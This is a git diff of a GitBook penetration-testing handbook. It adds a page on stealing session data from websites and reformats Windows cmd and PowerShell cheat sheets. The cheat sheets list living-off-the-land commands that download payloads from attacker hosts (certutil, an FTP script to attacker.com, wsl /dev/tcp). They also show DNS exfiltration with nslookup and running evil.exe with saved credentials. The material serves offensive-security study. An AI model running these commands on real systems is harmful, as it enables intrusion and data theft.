GitBook: [master] 5 pages modified

SUMMARY.md

@@ -417,4 +417,5 @@
 * [Online Platforms with API](online-platforms-with-api.md)
 * [Phising Documents](phising-documents.md)
 * [Reset Password Bypass](reset-password.md)
+* [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)
 

pentesting/pentesting-smb.md

@@ -264,7 +264,9 @@ smbclient //<IP>/<share>
 > mget *
 #Download everything to current directory
 ```
+
 Commands:
+
 * mask: specifies the mask which is used to filter the files within the directory \(e.g. "" for all files\)
 * resurse: toggles recursion on \(default: off\)
 * prompt: toggles prompting for filesnames off \(default: on\)

stealing-sensitive-information-disclosure-from-a-web.md

@@ -0,0 +1,10 @@
+# Stealing Sensitive Information Disclosure from a Web
+
+If at some point you find a **web page that presents you sensitive information based on your session**: Maybe it's reflecting cookies, or printing or CC details or any other sensitive information, you may try to steal it.  
+Here I present you the main ways to can try to achieve it:
+
+* [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
+* \*\*\*\*[**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
+* \*\*\*\*[**Danging Markup**](pentesting-web/dangling-markup-html-scriptless-injection.md): If you cannot inject XSS tags you still may be able to steal the info using other regular HTML tags.
+* [**Clickjaking**](pentesting-web/clickjacking.md): If there is no  protection against this attack, you may be able to trick the user into sending you the sensitive data \(an example [here](https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20)\).
+

windows/basic-cmd-for-pentesters.md

@@ -252,111 +252,133 @@ arp -A
 ## Download
 
 Bitsadmin.exe
+
 ```text
 bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
 ```
 
 CertReq.exe
+
 ```text
 CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
 ```
 
 Certutil.exe
+
 ```text
 certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
 ```
 
 Desktopimgdownldr.exe
+
 ```text
 set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
 ```
 
 Diantz.exe
+
 ```text
 diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
 ```
 
 Esentutl.exe
+
 ```text
 esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
 ```
 
 Expand.exe
+
 ```text
 expand \\webdav\folder\file.bat c:\ADS\file.bat
 ```
 
 Extrac32.exe
+
 ```text
 extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
 ```
 
 Findstr.exe
+
 ```text
 findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
 ```
 
 Ftp.exe
+
 ```text
 cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
 ```
 
 GfxDownloadWrapper.exe
+
 ```text
 C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
 ```
 
 Hh.exe
+
 ```text
 HH.exe http://some.url/script.ps1
 ```
 
 Ieexec.exe
+
 ```text
 ieexec.exe http://x.x.x.x:8080/bypass.exe
 ```
 
 Makecab.exe
+
 ```text
 makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
 ```
 
 MpCmdRun.exe
+
 ```text
 MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
 ```
 
 Replace.exe
+
 ```text
 replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
 ```
 
 Excel.exe
+
 ```text
 Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
 ```
 
 Powerpnt.exe
+
 ```text
 Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
 ```
 
 Squirrel.exe
+
 ```text
 squirrel.exe --download [url to package]
 ```
 
 Update.exe
+
 ```text
 Update.exe --download [url to package]
 ```
 
 Winword.exe
+
 ```text
 winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
 ```
 
 Wsl.exe
+
 ```text
 wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
 ```
@@ -373,7 +395,7 @@ time #Get current time
 date #Get current date
 shutdown /r /t 0 #Shutdown now
 type <file> #Cat file
-    
+
 #Runas
 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
 runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
@@ -411,12 +433,12 @@ netsh http show urlacl
 
 ```bash
 sudo responder -I <iface> #Active
-sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive 
+sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
 ```
 
 #### Victim
 
-_**for /f tokens**_ ****technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
+_**for /f tokens**_ _\*\*_technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
 
 ```text
 for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami

windows/basic-powershell-for-pentesters/README.md

@@ -40,21 +40,25 @@ powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
 ## Download
 
 ### System.Net.WebClient
+
 ```text
 (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
 ```
 
 ### Invoke-WebRequest
+
 ```text
 Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
 ```
 
 ### Wget
+
 ```text
 wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
 ```
 
 ### BitsTransfer
+
 ```text
 Import-Module BitsTransfer
 Start-BitsTransfer -Source $url -Destination $output